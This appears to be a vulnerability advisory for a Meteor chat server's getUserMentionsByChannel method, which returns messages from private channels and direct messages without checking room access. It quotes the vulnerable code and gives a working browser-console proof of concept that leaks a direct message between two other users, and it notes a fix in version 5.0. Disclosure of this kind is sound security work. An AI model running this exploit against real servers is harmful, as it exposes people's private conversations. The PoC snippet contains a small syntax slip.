The getUserMentionsByChannel
meteor server method discloses messages from private channels and direct messages regardless of the users access permission to the room.
When calling the getUserMentionsByChannel
method, the server does not check the users access to the given room and returns all messages the user has been mentioned in.
Meteor.call(
"getUserMentionsByChannel",
{ roomId: "<TARGET_ROOM>" },
console.log
);
The issue was found in app/mentions/server/methods/getUserMentionsByChannel.js#L7-L23 where roomId is verified to be a String only.
Meteor.methods({
getUserMentionsByChannel({ roomId, options }) {
check(roomId, String);
if (!Meteor.userId()) {
throw new Meteor.Error('error-invalid-user', 'Invalid user', { method: 'getUserMentionsByChannel' });
}
const room = Rooms.findOneById(roomId);
if (!room) {
throw new Meteor.Error('error-invalid-room', 'Invalid room', { method: 'getUserMentionsByChannel' });
}
const user = Users.findOneById(Meteor.userId());
return Messages.findVisibleByMentionAndRoomId(user.username, roomId, options).fetch();
},
});
The server will return all messages the requesting user has been @ mentioned in.
4.1.2
3.18.3
getUserMentionsByChannel
with given { roomId: "<Value>" }
The following example leks a private message between two users to a third account trudy
who performs the requests from the authenticated client disclosing a direct message between alice
and bob
.
Meteor.user().username
// > 'trudy'
let alice = 'kYfzDMQLyPFjS9ASb';
let bob = 'zZnrfd2RvcWhspr6S';
Meteor.call(
"getUserMentionsByChannel",
{ roomId: `${alice}${bob} }, // direct message channel
(err, data) => console.log(
data
.map((m) => `${m._id} ${m.u.username} (${m.ts.toGMTString()}): ${m.msg}`)
.join("\n")
)
);
// > Yp6NoMZk34mnQZiBR alice (Thu, 25 Nov 2021 14:17:25 UTC): Mention @trudy somewhere
Meteor.call("getMessages", ["Yp6NoMZk34mnQZiBR"], (err, data) => console.log(err.message))
// > Not allowed [error-not-allowed]
{ roomId }
method argument.Authenticated users can disclose all messages they were mentioned in from private channels and direct messages they should not have access to.
We have fix this issue in version 5.0>